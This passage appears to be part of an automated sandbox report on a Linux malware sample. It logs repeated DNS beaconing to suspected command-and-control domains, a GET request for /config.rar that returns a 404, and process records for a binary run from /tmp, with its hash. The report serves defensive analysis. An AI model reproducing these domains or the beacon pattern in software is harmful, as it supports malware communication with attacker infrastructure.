                                                                  Aug 20, 2024 15:35:04.850817919 CEST192.168.2.238.8.8.80xd92bStandard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:35:04.865923882 CEST192.168.2.238.8.4.40x5fa4Standard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:35:04.877650976 CEST192.168.2.238.8.8.80xe19eStandard query (0)ww.gzcfr5axf6.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:35:09.889811039 CEST192.168.2.238.8.8.80xc41fStandard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:35:10.913961887 CEST192.168.2.238.8.4.40x7882Standard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:35:10.927124023 CEST192.168.2.238.8.8.80x657fStandard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:35:10.937413931 CEST192.168.2.238.8.4.40xe634Standard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:35:10.947216034 CEST192.168.2.238.8.8.80xd447Standard query (0)ww.gzcfr5axf6.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:35:15.959306955 CEST192.168.2.238.8.8.80x7458Standard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:35:15.969558001 CEST192.168.2.238.8.4.40x3090Standard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:35:15.979016066 CEST192.168.2.238.8.8.80x6471Standard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:35:15.989461899 CEST192.168.2.238.8.4.40xee01Standard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:35:16.000513077 CEST192.168.2.238.8.8.80x768Standard query (0)ww.gzcfr5axf6.comA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Aug 20, 2024 15:33:13.222019911 CEST8.8.8.8192.168.2.230xca08No error (0)aaa.dsaj2a.org23.253.46.64A (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:13.228251934 CEST8.8.8.8192.168.2.230xa94cName error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:13.238188982 CEST8.8.4.4192.168.2.230x8b88Name error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:13.248281002 CEST8.8.8.8192.168.2.230x3a25Name error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:13.258411884 CEST8.8.4.4192.168.2.230x1f40Name error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:13.267524958 CEST8.8.8.8192.168.2.230x964eNo error (0)ww.gzcfr5axf6.com23.235.171.197A (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:18.282238007 CEST8.8.8.8192.168.2.230xd316Name error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:18.295133114 CEST8.8.4.4192.168.2.230x787fName error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:18.322721004 CEST8.8.8.8192.168.2.230x4b24Name error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:18.339209080 CEST8.8.4.4192.168.2.230x15a6Name error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:18.354532957 CEST8.8.8.8192.168.2.230x5093No error (0)ww.gzcfr5axf6.com23.235.171.197A (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:23.369297028 CEST8.8.8.8192.168.2.230x39feName error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:23.380069971 CEST8.8.4.4192.168.2.230xdaebName error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:23.397413015 CEST8.8.8.8192.168.2.230x87cbName error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:23.409084082 CEST8.8.4.4192.168.2.230xc293Name error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:23.416302919 CEST8.8.8.8192.168.2.230x541dNo error (0)ww.gzcfr5axf6.com23.235.171.197A (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:28.436206102 CEST8.8.8.8192.168.2.230x5da7Name error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:28.456479073 CEST8.8.4.4192.168.2.230xb232Name error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:28.468933105 CEST8.8.8.8192.168.2.230x6777Name error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:28.479259968 CEST8.8.4.4192.168.2.230x8c4bName error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:28.499183893 CEST8.8.8.8192.168.2.230xf4ffNo error (0)ww.gzcfr5axf6.com23.235.171.197A (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:33.527622938 CEST8.8.8.8192.168.2.230x2ccbName error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:33.539046049 CEST8.8.4.4192.168.2.230x4a07Name error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:33.555068970 CEST8.8.8.8192.168.2.230xae84Name error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:33.565102100 CEST8.8.4.4192.168.2.230x51e8Name error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:33.572416067 CEST8.8.8.8192.168.2.230x18b0No error (0)ww.gzcfr5axf6.com23.235.171.197A (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:38.586992979 CEST8.8.8.8192.168.2.230x4328Name error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:38.603593111 CEST8.8.4.4192.168.2.230x13daName error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:38.625411987 CEST8.8.8.8192.168.2.230xeaf3Name error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:38.636445045 CEST8.8.4.4192.168.2.230xe116Name error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:38.656827927 CEST8.8.8.8192.168.2.230xb982No error (0)ww.gzcfr5axf6.com23.235.171.197A (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:43.670757055 CEST8.8.8.8192.168.2.230xe27cName error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:43.685909986 CEST8.8.4.4192.168.2.230x343cName error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:43.695863962 CEST8.8.8.8192.168.2.230xa012Name error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:43.706366062 CEST8.8.4.4192.168.2.230xb55aName error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:43.719875097 CEST8.8.8.8192.168.2.230x9476No error (0)ww.gzcfr5axf6.com23.235.171.197A (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:48.736217022 CEST8.8.8.8192.168.2.230x2208Name error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:48.746845007 CEST8.8.4.4192.168.2.230x7c67Name error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:48.757909060 CEST8.8.8.8192.168.2.230x3b04Name error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:48.767620087 CEST8.8.4.4192.168.2.230xa6e6Name error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:48.785546064 CEST8.8.8.8192.168.2.230xe776No error (0)ww.gzcfr5axf6.com23.235.171.197A (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:53.823205948 CEST8.8.8.8192.168.2.230xcbd7Name error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:53.834819078 CEST8.8.4.4192.168.2.230xf523Name error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:53.844042063 CEST8.8.8.8192.168.2.230xbf3Name error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:53.860893011 CEST8.8.4.4192.168.2.230x72cdName error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:53.868809938 CEST8.8.8.8192.168.2.230xb17fNo error (0)ww.gzcfr5axf6.com23.235.171.197A (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:58.883702040 CEST8.8.8.8192.168.2.230x4072Name error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:58.894099951 CEST8.8.4.4192.168.2.230xb849Name error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:58.903830051 CEST8.8.8.8192.168.2.230xfc2fName error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:58.919605970 CEST8.8.4.4192.168.2.230xd75aName error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:58.928422928 CEST8.8.8.8192.168.2.230xc570No error (0)ww.gzcfr5axf6.com23.235.171.197A (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:03.945302010 CEST8.8.8.8192.168.2.230x13ffName error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:03.956146955 CEST8.8.4.4192.168.2.230x4994Name error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:03.969789028 CEST8.8.8.8192.168.2.230x176fName error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:03.979603052 CEST8.8.4.4192.168.2.230xc4b1Name error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:03.987632036 CEST8.8.8.8192.168.2.230x5419No error (0)ww.gzcfr5axf6.com23.235.171.197A (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:09.000402927 CEST8.8.8.8192.168.2.230x5d47Name error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:09.018481970 CEST8.8.4.4192.168.2.230x8012Name error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:09.033356905 CEST8.8.8.8192.168.2.230x4166Name error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:09.044285059 CEST8.8.4.4192.168.2.230xda42Name error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:09.051935911 CEST8.8.8.8192.168.2.230x5f3No error (0)ww.gzcfr5axf6.com23.235.171.197A (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:14.066730976 CEST8.8.8.8192.168.2.230xf2dfName error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:14.077651978 CEST8.8.4.4192.168.2.230xa12fName error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:14.111656904 CEST8.8.8.8192.168.2.230xa857Name error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:14.133721113 CEST8.8.4.4192.168.2.230xa061Name error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:14.140583992 CEST8.8.8.8192.168.2.230x5ae7No error (0)ww.gzcfr5axf6.com23.235.171.197A (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:19.154084921 CEST8.8.8.8192.168.2.230x61adName error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:19.164902925 CEST8.8.4.4192.168.2.230xfefbName error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:19.177695036 CEST8.8.8.8192.168.2.230xc0aName error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:19.194538116 CEST8.8.4.4192.168.2.230x28abName error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:19.218457937 CEST8.8.8.8192.168.2.230x6d51No error (0)ww.gzcfr5axf6.com23.235.171.197A (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:24.233237028 CEST8.8.8.8192.168.2.230xae18Name error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:24.243072033 CEST8.8.4.4192.168.2.230x5df2Name error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:24.254429102 CEST8.8.8.8192.168.2.230x1205Name error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:24.267159939 CEST8.8.4.4192.168.2.230x8e44Name error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:24.274929047 CEST8.8.8.8192.168.2.230x8c52No error (0)ww.gzcfr5axf6.com23.235.171.197A (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:29.291583061 CEST8.8.8.8192.168.2.230x334eName error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:29.314192057 CEST8.8.4.4192.168.2.230x196aName error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:29.323683023 CEST8.8.8.8192.168.2.230x1bc0Name error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:29.339569092 CEST8.8.4.4192.168.2.230x7b7dName error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:29.347484112 CEST8.8.8.8192.168.2.230x2510No error (0)ww.gzcfr5axf6.com23.235.171.197A (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:34.375806093 CEST8.8.8.8192.168.2.230xfd36Name error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:34.391058922 CEST8.8.4.4192.168.2.230xd216Name error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:34.401767969 CEST8.8.8.8192.168.2.230x1485Name error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:34.413877010 CEST8.8.4.4192.168.2.230x7244Name error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:34.420672894 CEST8.8.8.8192.168.2.230x5f9bNo error (0)ww.gzcfr5axf6.com23.235.171.197A (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:39.445445061 CEST8.8.8.8192.168.2.230xf563Name error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:39.455568075 CEST8.8.4.4192.168.2.230x8573Name error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:39.493314028 CEST8.8.8.8192.168.2.230xbdf2Name error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:39.511337042 CEST8.8.4.4192.168.2.230x6565Name error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:39.518507957 CEST8.8.8.8192.168.2.230x3b21No error (0)ww.gzcfr5axf6.com23.235.171.197A (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:44.555475950 CEST8.8.8.8192.168.2.230xccfcName error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:44.569109917 CEST8.8.4.4192.168.2.230x35b6Name error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:44.582562923 CEST8.8.8.8192.168.2.230xa23fName error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:44.593102932 CEST8.8.4.4192.168.2.230x4920Name error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:44.609062910 CEST8.8.8.8192.168.2.230x7652No error (0)ww.gzcfr5axf6.com23.235.171.197A (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:49.625333071 CEST8.8.8.8192.168.2.230xf492Name error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:49.635902882 CEST8.8.4.4192.168.2.230xffa9Name error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:49.659149885 CEST8.8.8.8192.168.2.230xea5bName error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:49.670355082 CEST8.8.4.4192.168.2.230x6d5eName error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:49.679826975 CEST8.8.8.8192.168.2.230xfb51No error (0)ww.gzcfr5axf6.com23.235.171.197A (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:54.701713085 CEST8.8.8.8192.168.2.230x6d2Name error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:54.711842060 CEST8.8.4.4192.168.2.230xc211Name error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:54.722115993 CEST8.8.8.8192.168.2.230x640bName error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:54.732453108 CEST8.8.4.4192.168.2.230xf36fName error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:54.739579916 CEST8.8.8.8192.168.2.230xbd37No error (0)ww.gzcfr5axf6.com23.235.171.197A (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:59.760524035 CEST8.8.8.8192.168.2.230xbf8aName error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:59.771076918 CEST8.8.4.4192.168.2.230x661fName error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:59.795047998 CEST8.8.8.8192.168.2.230x7f5bName error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:59.813102961 CEST8.8.4.4192.168.2.230xb91fName error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:59.819709063 CEST8.8.8.8192.168.2.230xba95No error (0)ww.gzcfr5axf6.com23.235.171.197A (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:35:04.840450048 CEST8.8.8.8192.168.2.230xd664Name error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:35:04.850723982 CEST8.8.4.4192.168.2.230x3d47Name error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:35:04.865865946 CEST8.8.8.8192.168.2.230xd92bName error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:35:04.877391100 CEST8.8.4.4192.168.2.230x5fa4Name error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:35:04.885186911 CEST8.8.8.8192.168.2.230xe19eNo error (0)ww.gzcfr5axf6.com23.235.171.197A (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:35:10.913506031 CEST8.8.8.8192.168.2.230xc41fName error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:35:10.926918030 CEST8.8.4.4192.168.2.230x7882Name error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:35:10.937247992 CEST8.8.8.8192.168.2.230x657fName error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:35:10.947144985 CEST8.8.4.4192.168.2.230xe634Name error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:35:10.954763889 CEST8.8.8.8192.168.2.230xd447No error (0)ww.gzcfr5axf6.com23.235.171.197A (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:35:15.969352961 CEST8.8.8.8192.168.2.230x7458Name error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:35:15.978885889 CEST8.8.4.4192.168.2.230x3090Name error (3)ww.dnstells.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:35:15.989343882 CEST8.8.8.8192.168.2.230x6471Name error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:35:16.000397921 CEST8.8.4.4192.168.2.230xee01Name error (3)ww.gzcfr5axf7.comnonenoneA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:35:16.008491993 CEST8.8.8.8192.168.2.230x768No error (0)ww.gzcfr5axf6.com23.235.171.197A (IP address)IN (0x0001)false
                                                                  • aaa.dsaj2a.org
                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                  0192.168.2.233528223.253.46.6480
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 20, 2024 15:33:13.228722095 CEST229OUTGET /config.rar HTTP/1.1
                                                                  Accept: */*
                                                                  Accept-Language: zh-cn
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
                                                                  Host: aaa.dsaj2a.org
                                                                  Connection: Keep-Alive
                                                                  Aug 20, 2024 15:33:13.718792915 CEST1236INHTTP/1.1 404 Not Found
                                                                  Content-Type: text/html
                                                                  Server: Microsoft-IIS/7.5
                                                                  X-Powered-By: ASP.NET
                                                                  Date: Tue, 20 Aug 2024 13:33:08 GMT
                                                                  Content-Length: 1245
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                  Aug 20, 2024 15:33:13.718806028 CEST193INData Raw: 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74
                                                                  Data Ascii: ound.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                  System Behavior

                                                                  Start time (UTC):13:33:06
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/dash
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):13:33:06
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/rm
                                                                  Arguments:rm -f /tmp/tmp.bf7OUfIiir /tmp/tmp.YpFzGJMNgu /tmp/tmp.lS9NOxlH0t
                                                                  File size:72056 bytes
                                                                  MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                  Start time (UTC):13:33:06
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/dash
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):13:33:06
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/rm
                                                                  Arguments:rm -f /tmp/tmp.bf7OUfIiir /tmp/tmp.YpFzGJMNgu /tmp/tmp.lS9NOxlH0t
                                                                  File size:72056 bytes
                                                                  MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                  Start time (UTC):13:33:11
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:/tmp/HaJTqGiPpD
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:11
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:11
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:11
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:33:11
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
